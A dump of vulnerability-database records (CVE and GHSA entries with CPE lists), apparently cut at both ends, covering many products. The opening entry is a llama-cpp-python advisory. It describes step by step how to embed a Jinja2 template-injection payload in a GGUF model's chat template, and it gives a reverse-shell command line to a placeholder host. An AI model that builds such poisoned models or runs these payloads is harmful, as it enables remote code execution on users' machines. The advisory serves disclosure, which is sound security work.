`llama_chat_format.Jinja2ChatFormatter` as params which furthermore stored the `to_chat_handler()` as `chat_handler``llama_chat_format.py` -> `Jinja2ChatFormatter`:`self._environment = jinja2.Environment( -> from_string(self.template) -> self._environment.render(`As we can see in `llama_chat_format.py` -> `Jinja2ChatFormatter`, the constructor `__init__` initialized required `members` inside of the class; Nevertheless, focusing on this line:Fun thing here: `llama_cpp_python` directly loads the `self.template` (`self.template = template` which is the `chat template` located in the `Metadate` that is parsed as a param) via `jinja2.Environment.from_string(` without setting any sandbox flag or using the protected `immutablesandboxedenvironment `class. This is extremely unsafe since the attacker can implicitly tell `llama_cpp_python` to load malicious `chat template` which is furthermore rendered in the `__call__` constructor, allowing RCEs or Denial-of-Service since `jinja2`'s renderer evaluates embed codes like `eval()`, and we can utilize expose method by exploring the attribution such as `__globals__`, `__subclasses__` of pretty much anything.ExploitingFor our exploitation, we first downloaded [qwen1_5-0_5b-chat-q2_k.gguf](https://huggingface.co/Qwen/Qwen1.5-0.5B-Chat-GGUF/blob/main/qwen1_5-0_5b-chat-q2_k.gguf) of `Qwen/Qwen1.5-0.5B-Chat-GGUF` on `huggingface` as the base of the exploitation, by importing the file to `Hex-compatible` editors (In my case I used the built-in `Hex editor` or `vscode`), you can try to search for key `chat_template` (imported as `template = self.metadata["tokenizer.chat_template"]` in `llama-cpp-python`):`qwen1_5-0_5b-chat-q2_k.gguf` appears to be using the OG `role+message` and using the fun `jinja2` syntax. By first replacing the original `chat_template` in `\x00`, then inserting our SSTI payload. We constructed this payload which firstly iterates over the subclasses of the base class of all classes in Python. The expression `().__class__.__base__.__subclasses__()` retrieves a list of all subclasses of the basic `object` class and then we check if its `warning` by `if "warning" in x.__name__`, if it is , we access its module via the `_module` attribute then access Python's built-in functions through `__builtins__` and uses the `__import__` function to import the `os` module and finally we called `os.popen` to `touch /tmp/retr0reg`, create an empty file call `retr0reg` under `/tmp/`in real life exploiting instance, we can change `touch /tmp/retr0reg` into arbitrary codes like `sh -i >& /dev/tcp/<HOST>/<PORT> 0>&1` to create a reverse shell connection to specified host, in our case we are using `touch /tmp/retr0reg` to showcase the exploitability of this vulnerability.After these steps, we got ourselves a malicious model with an embedded payload in `chat_template` of the `metahead`, in which will be parsed and rendered by `llama.py:class Llama:init -> self.chat_handler `-> `llama_chat_format.py:Jinja2ChatFormatter:init -> self._environment = jinja2.Environment(` -> ``llama_chat_format.py:Jinja2ChatFormatter:call -> self._environment.render(`*(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )*Now when the model is loaded whether as ` Llama.from_pretrained` or `Llama` and chatted, our malicious code in the `chat_template` of the `metahead` will be triggered and execute arbitrary code.PoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing | [] |
GHSA-897c-qrwm-m638 | Cross-site scripting (XSS) vulnerability in the refresh_page function in application/modules/_main/views/_top.php in Total Shop UK eCommerce Open Source before 2.1.2_p1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. | [] |
|
GHSA-gr78-3hpw-xf56 | In getMediaOutputSliceAction of RemoteMediaSlice.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174047735 | [] |
|
GHSA-c9vc-596v-cxc3 | When opening a Hangul Hcell Document (.cell) and processing a particular record within the Workbook stream, an index miscalculation leading to a heap overlow can be made to occur in Hancom Office 2014. The vulnerability occurs when processing data for a formula used to render a chart via the HncChartPlugin.hplg library. Due to a lack of bounds-checking when incrementing an index that is used for writing into a buffer for formulae, the application can be made to write pointer data outside its bounds which can lead to code execution under the context of the application. | [] |
|
GHSA-5p52-j8pw-j7x5 | Improper Restriction of XML External Entity Reference in bedework:bw-webdav | Apereo Bedework bw-webdav before 4.0.3 allows XXE attacks, as demonstrated by an invite-reply document that reads a local file, related to webdav/servlet/common/MethodBase.java and webdav/servlet/common/PostRequestPars.java. | [] |
CVE-2020-7791 | Denial of Service (DoS) | This affects the package i18n before 2.1.15. Vulnerability arises out of insufficient handling of erroneous language tags in src/i18n/Concrete/TextLocalizer.cs and src/i18n/LocalizedApplication.cs. | [
"cpe:2.3:a:i18n_project:i18n:*:*:*:*:*:asp.net:*:*"
] |
GHSA-pmc3-v8x7-chwc | A SQL injection vulnerability exists in the front-end of the website in ZZCMS <= 2023, which can be exploited without any authentication. This vulnerability could potentially allow attackers to gain unauthorized access to the database and extract sensitive information. | [] |
|
GHSA-v3j8-73vp-j87v | Memory corruption when the mapped pages in VBO are still mapped after reclaiming by shrinker. | [] |
|
GHSA-mg74-x7cm-fcp3 | Battelle V2I Hub 2.5.1 is vulnerable to SQL injection. A remote authenticated attacker could send specially-crafted SQL statements to /api/PluginStatusActions.php and /status/pluginStatus.php using the jtSorting or id parameter, which could allow the attacker to view, add, modify or delete information in the back-end database. | [] |
|
CVE-2023-50774 | A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system. | [
"cpe:2.3:a:jenkins:html_resource:1.01:*:*:*:*:*:*:*",
"cpe:2.3:a:jenkins:html_resource:1.02:*:*:*:*:*:*:*"
] |
|
GHSA-m3gr-x5g2-5vv3 | Directory traversal vulnerability in logs-x.php in WebTitan before 4.04 allows remote attackers to read arbitrary files via a .. (dot dot) in the logfile parameter in a download action. | [] |
|
GHSA-5rh4-37gg-5rpp | Mixed content blocking of insecure (HTTP) sub-resources in a secure (HTTPS) document was not correctly applied for resources that redirect from HTTPS to HTTP, allowing content that should be blocked, such as scripts, to be loaded on a page. This vulnerability affects Firefox < 57. | [] |
|
GHSA-x3qp-qwx3-f6qc | Huawei P7 before P7-L00C17B851, P7-L05C00B851, and P7-L09C92B851 and P8 ALE-UL00 before ALE-UL00B211 allows local users to cause a denial of service (OS crash) via vectors involving an application that passes crafted input to the GPU driver. | [] |
|
GHSA-2gqg-96r8-5h58 | Wrap-around error in Linux kernel mode driver for some Intel(R) Ethernet Network Controllers and Adapters before version 28.3 may allow an authenticated user to potentially enable escalation of privilege via local access. | [] |
|
GHSA-5p79-q8cw-m9p4 | Stack-based buffer overflow vulnerability in Vigor3900, Vigor2960, and Vigor300B with firmware before 1.5.1.1. | [] |
|
CVE-2023-7231 | illi Link Party! <= 1.0 - Unauthenticated Arbitrary Link Deletion | The illi Link Party! WordPress plugin through 1.0 lacks proper access controls, allowing unauthenticated visitors to delete links. | [] |
GHSA-r6w6-q776-2fqr | Online Bus Booking System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'user_email' parameter of the bus_info.php resource does not validate the characters received and they are sent unfiltered to the database. | [] |
|
CVE-2007-1279 | Unspecified vulnerability in the installer for Adobe Bridge 1.0.3 update for Apple OS X, when patching with desktop management tools, allows local users to gain privileges via unspecified vectors during installation of the update by a different user who has administrative privileges. | [
"cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
"cpe:2.3:a:adobe:bridge:1.0.3:*:*:*:*:*:*:*"
] |
|
CVE-2021-24297 | Goto < 2.1 - Reflected Cross-Site Scripting (XSS) | The Goto WordPress theme before 2.1 did not properly sanitize the formvalue JSON POST parameter in its tl_filter AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability. | [
"cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:*"
] |
GHSA-26hq-7m9g-65cf | Adobe Flash Player versions 29.0.0.113 and earlier have an exploitable Use-After-Free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. | [] |
|
CVE-2022-23292 | Microsoft Power BI Spoofing Vulnerability | Microsoft Power BI Spoofing Vulnerability | [
"cpe:2.3:a:microsoft:on-premises_data_gateway:*:*:*:*:*:*:*:*"
] |
GHSA-h99j-7r79-64w9 | Heap-based buffer overflow in Adobe Acrobat Reader and Acrobat Professional 7.1.0, 8.1.3, 9.0.0, and other versions allows remote attackers to execute arbitrary code via a PDF file containing a JBIG2 stream with a size inconsistency related to an unspecified table. | [] |
|
GHSA-f74c-6mfp-rg2q | A Use of Weak Credentials vulnerability affecting the Wi-Fi network generated by a set of DJI drones could allow a remote attacker to derive the WPA2 PSK key and authenticate without permission to the drone’s Wi- Fi network. This, in turn, allows the attacker to perform unauthorized interaction with the network services exposed by the drone and to potentially decrypt the Wi-Fi traffic exchanged between the drone and the Android/IOS device of the legitimate user during QuickTransfer mode. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620. | [] |
|
CVE-2008-0312 | Stack-based buffer overflow in the AutoFix Support Tool ActiveX control 2.7.0.1 in SYMADATA.DLL in multiple Symantec Norton products, including Norton 360 1.0, AntiVirus 2006 through 2008, Internet Security 2006 through 2008, and System Works 2006 through 2008, allows remote attackers to execute arbitrary code via a long argument to the GetEventLogInfo method. NOTE: some of these details are obtained from third party information. | [
"cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_360:1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_antivirus:2006:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_antivirus:2007:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_antivirus:2008:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_internet_security:2006:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_internet_security:2007:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_internet_security:2008:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_system_works:2006:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_system_works:2007:*:*:*:*:*:*:*",
"cpe:2.3:a:symantec:norton_system_works:2008:*:*:*:*:*:*:*"
] |
|
CVE-2024-54227 | WordPress Minimum and Maximum Quantity for WooCommerce plugin <= 2.0.0 - Broken Access Control vulnerability | Missing Authorization vulnerability in theDotstore Minimum and Maximum Quantity for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Minimum and Maximum Quantity for WooCommerce: from n/a through 2.0.0. | [] |
CVE-2021-37548 | In JetBrains TeamCity before 2021.1, passwords in cleartext sometimes could be stored in VCS. | [
"cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*"
] |
|
CVE-2008-2624 | Unspecified vulnerability in the Oracle OLAP component in Oracle Database 10.1.0.5 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. | [
"cpe:2.3:a:oracle:database_10g:10.1.0.5:*:*:*:*:*:*:*"
] |
|
CVE-2018-3027 | Vulnerability in the Oracle Banking Payments component of Oracle Financial Services Applications (subcomponent: Payments Core). Supported versions that are affected are 12.2.0, 12.3.0, 12.4.0, 12.5.0 and 14.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Payments. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Banking Payments accessible data as well as unauthorized access to critical data or complete access to all Oracle Banking Payments accessible data. CVSS 3.0 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | [
"cpe:2.3:a:oracle:banking_payments:12.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:banking_payments:12.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:banking_payments:12.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:banking_payments:12.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:banking_payments:14.1.0:*:*:*:*:*:*:*"
] |
|
CVE-2015-1901 | The installer in IBM InfoSphere Information Server 8.5 through 11.3 before 11.3.1.2 allows local users to obtain sensitive information via unspecified commands. | [
"cpe:2.3:a:ibm:infosphere_information_server:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.5.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.5.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.5.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.7:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.7.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:8.7.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:9.1:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:9.1.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:9.1.2:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:11.3:*:*:*:*:*:*:*",
"cpe:2.3:a:ibm:infosphere_information_server:11.3.1:*:*:*:*:*:*:*"
] |
|
CVE-2022-1460 | An issue has been discovered in GitLab affecting all versions starting from 9.2 before 14.8.6, all versions starting from 14.9 before 14.9.4, all versions starting from 14.10 before 14.10.1. GitLab was not performing correct authorizations on scheduled pipelines allowing a malicious user to run a pipeline in the context of another user. | [
"cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*",
"cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
"cpe:2.3:a:gitlab:gitlab:14.10.0:*:*:*:community:*:*:*",
"cpe:2.3:a:gitlab:gitlab:14.10.0:*:*:*:enterprise:*:*:*"
] |
|
GHSA-m7g5-qwgm-89mc | Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in the licensing feature of ICONICS GENESIS64 versions 10.97 to 10.97.2, Mitsubishi Electric GENESIS64 versions 10.97 to 10.97.2 and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute a malicious code with administrative privileges by tampering with a specific file that is not protected by the system. | [] |
|
CVE-2023-46602 | In International Color Consortium DemoIccMAX 79ecb74, there is a stack-based buffer overflow in the icFixXml function in IccXML/IccLibXML/IccUtilXml.cpp in libIccXML.a. | [
"cpe:2.3:a:color:demoiccmax:2022-06-21:*:*:*:*:*:*:*"
] |
|
GHSA-pg3w-vw47-9g7c | Adobe Substance 3D Stager versions 2.1.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | [] |
|
GHSA-5hv8-h736-6fwx | A vulnerability with the Border Gateway Protocol (BGP) for Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, remote attacker to cause a routing process to crash, which could lead to a denial of service (DoS) condition. This vulnerability is due to an issue with the installation of routes upon receipt of a BGP update. An attacker could exploit this vulnerability by sending a crafted BGP update to an affected device. A successful exploit could allow the attacker to cause the routing process to crash, which could cause the device to reload. This vulnerability applies to both Internal BGP (IBGP) and External BGP (EBGP). Note: The Cisco implementation of BGP accepts incoming BGP traffic from explicitly configured peers only. To exploit this vulnerability, an attacker would need to send a specific BGP update message over an established TCP connection that appears to come from a trusted BGP peer. | [] |
|
GHSA-88g4-46fj-wmhh | GUI overlay vulnerability in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 allows remote attackers to spoof certain user interface elements, such as the host name or security indicators, via the CSS3 hotspot property with a large, transparent, custom cursor. | [] |
|
GHSA-3m65-xvh4-3hm8 | A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.7, iOS 17.7 and iPadOS 17.7, visionOS 2, iOS 18 and iPadOS 18, macOS Sonoma 14.7, macOS Sequoia 15. Network traffic may leak outside a VPN tunnel. | [] |
|
CVE-2020-29369 | An issue was discovered in mm/mmap.c in the Linux kernel before 5.7.11. There is a race condition between certain expand functions (expand_downwards and expand_upwards) and page-table free operations from an munmap call, aka CID-246c320a8cfe. | [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
"cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
"cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
"cpe:2.3:h:netapp:hci_storage_node:-:*:*:*:*:*:*:*"
] |
|
GHSA-mqpv-8w9q-vgj2 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ILLID Advanced Woo Labels allows Cross-Site Scripting (XSS).This issue affects Advanced Woo Labels: from n/a through 1.93. | [] |
|
GHSA-98r7-fvm5-pv89 | The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact. NOTE: it could be argued that this is an issue in mssql_connect (CVE-2007-1411.1) in PHP, or an issue in the ADOdb Library, and the proper fix should be in one of these products; if so, then this should not be treated as a vulnerability in XAMPP. | [] |
|
GHSA-vxcr-89r6-82cr | Out of bound access due to Invalid inputs to dapm mux settings which results into kernel failure in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9607, Nicobar, QCS405, Rennell, SA6155P, Saipan, SC8180X, SDM630, SDM636, SDM660, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130 | [] |
|
CVE-2021-30560 | Use after free in Blink XSLT in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. | [
"cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*",
"cpe:2.3:a:xmlsoft:libxslt:*:*:*:*:*:*:*:*",
"cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"cpe:2.3:a:splunk:universal_forwarder:*:*:*:*:*:*:*:*",
"cpe:2.3:a:splunk:universal_forwarder:9.1.0:*:*:*:*:*:*:*"
] |
|
GHSA-q968-w577-25v5 | Adobe Reader and Acrobat before 11.0.18, Acrobat and Acrobat Reader DC Classic before 15.006.30243, and Acrobat and Acrobat Reader DC Continuous before 15.020.20039 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-6940, CVE-2016-6941, CVE-2016-6942, CVE-2016-6943, CVE-2016-6947, CVE-2016-6948, CVE-2016-6950, CVE-2016-6951, CVE-2016-6954, CVE-2016-6955, CVE-2016-6956, CVE-2016-6959, CVE-2016-6960, CVE-2016-6966, CVE-2016-6970, CVE-2016-6972, CVE-2016-6973, CVE-2016-6974, CVE-2016-6975, CVE-2016-6976, CVE-2016-6977, CVE-2016-6978, CVE-2016-6995, CVE-2016-6996, CVE-2016-6997, CVE-2016-6998, CVE-2016-7000, CVE-2016-7001, CVE-2016-7002, CVE-2016-7003, CVE-2016-7004, CVE-2016-7005, CVE-2016-7006, CVE-2016-7007, CVE-2016-7008, CVE-2016-7009, CVE-2016-7010, CVE-2016-7011, CVE-2016-7012, CVE-2016-7014, CVE-2016-7015, CVE-2016-7016, CVE-2016-7017, CVE-2016-7018, and CVE-2016-7019. | [] |
|
GHSA-6qf9-3c85-x94q | This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.5.0 (49183). An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Parallels Service. By creating a symbolic link, an attacker can abuse the service to execute a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-13932. | [] |
|
GHSA-7chf-chrh-74q7 | IBM App Connect Enterprise 11.0.0.1 through 11.0.0.23, 12.0.1.0 through 12.0.9.0 and IBM Integration Bus for z/OS 10.1 through 10.1.0.2store potentially sensitive information in log or trace files that could be read by a privileged user. IBM X-Force ID: 280893. | [] |
|
CVE-2021-47054 | bus: qcom: Put child node before return | In the Linux kernel, the following vulnerability has been resolved:
bus: qcom: Put child node before return
Put child node before return to fix potential reference count leak.
Generally, the reference count of child is incremented and decremented
automatically in the macro for_each_available_child_of_node() and should
be decremented manually if the loop is broken in loop body. | [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
] |
GHSA-m98q-jg2r-mqmw | The TCP stack in the Linux kernel through 4.10.6 mishandles the SCM_TIMESTAMPING_OPT_STATS feature, which allows local users to obtain sensitive information from the kernel's internal socket data structures or cause a denial of service (out-of-bounds read) via crafted system calls, related to net/core/skbuff.c and net/socket.c. | [] |
|
CVE-2023-42549 | Use of implicit intent for sensitive communication vulnerability in startNameValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege. | [
"cpe:2.3:a:samsung:account:*:*:*:*:*:*:*:*"
] |
|
CVE-2018-12537 | In Eclipse Vert.x version 3.0 to 3.5.1, the HttpServer response headers and HttpClient request headers do not filter carriage return and line feed characters from the header value. This allow unfiltered values to inject a new header in the client request or server response. | [
"cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*"
] |
|
CVE-2024-47380 | WordPress WP-Lister Lite for eBay plugin <= 3.6.3 - Reflected Cross Site Scripting (XSS) vulnerability | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Lab WP-Lister Lite for eBay allows Reflected XSS.This issue affects WP-Lister Lite for eBay: from n/a through 3.6.3. | [] |
GHSA-vmcp-66r5-3pcp | Steeltoe Leaks Basic Auth Credentials to Logs After Fetch Registry Error | SummaryWhen utilizing multiple Eureka server service URLs with basic auth and encountering an issue with fetching the service registry, an error is logged with the Eureka server service URLs but only the first URL is masked.DetailsPackage: Steeltoe.Discovery.Eureka
Package version: 3.2.1
Branch: "release/3.2"
File name: `DiscoveryClient.cs`
Line number: 325
Code in question: `_logger.LogError(e, "FetchRegistry Failed for Eureka service urls: {EurekaServerServiceUrls}", new Uri(ClientConfig.EurekaServerServiceUrls).ToMaskedString());`Error message in logs: `FetchRegistry Failed for Eureka service urls: https://****:****@eureka1.com:443/eureka,https://user:[email protected]:443/eureka`I thought `new Uri(clientOptions.EurekaServerServiceUrls)` would throw a `UriFormatException` since there are multiple URLs but my logs are showing two URLs regardless.PoCSet Eureka config with multiple server URLs with basic authApologies for not being more descriptive for this step, but I believe we would just need to trigger an exception in `FetchFullRegistryAsync`.Check the logs and should see the errorImpactVulnerability: Credential leakage in the logs
Who does it impact?: Users who are using peer awareness with Spring Eureka | [] |
CVE-2010-2097 | The (1) iconv_mime_decode, (2) iconv_substr, and (3) iconv_mime_encode functions in PHP 5.2 through 5.2.13 and 5.3 through 5.3.2 allow context-dependent attackers to obtain sensitive information (memory contents) by causing a userspace interruption of an internal function, related to the call time pass by reference feature. | [
"cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*"
] |
|
CVE-2011-4971 | Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet. | [
"cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.2.7:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.2.8:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:memcached:memcached:1.4.4:*:*:*:*:*:*:*"
] |
|
CVE-2024-20437 | A vulnerability in the web-based management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a cross-site request forgery (CSRF) attack and execute commands on the CLI of an affected device.
This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an already authenticated user to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user. | [
"cpe:2.3:o:cisco:ios_xe:17.3.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.2a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.3:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.4:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.4a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.4b:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.4c:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.5:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.5a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.5b:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.6:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.7:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.8:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.3.8a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.4.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.4.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.4.1b:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.4.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.4.2a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.5.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.5.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1w:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1x:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1y:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1z:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.1z1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.3:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.3a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.4:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.5:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.5a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.6:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.6.6a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.7.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.7.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.7.1b:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.7.2:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.8.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.8.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1a:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1w:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1x:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1x1:*:*:*:*:*:*:*",
"cpe:2.3:o:cisco:ios_xe:17.9.1y:*:*:*:*:*:*:*",
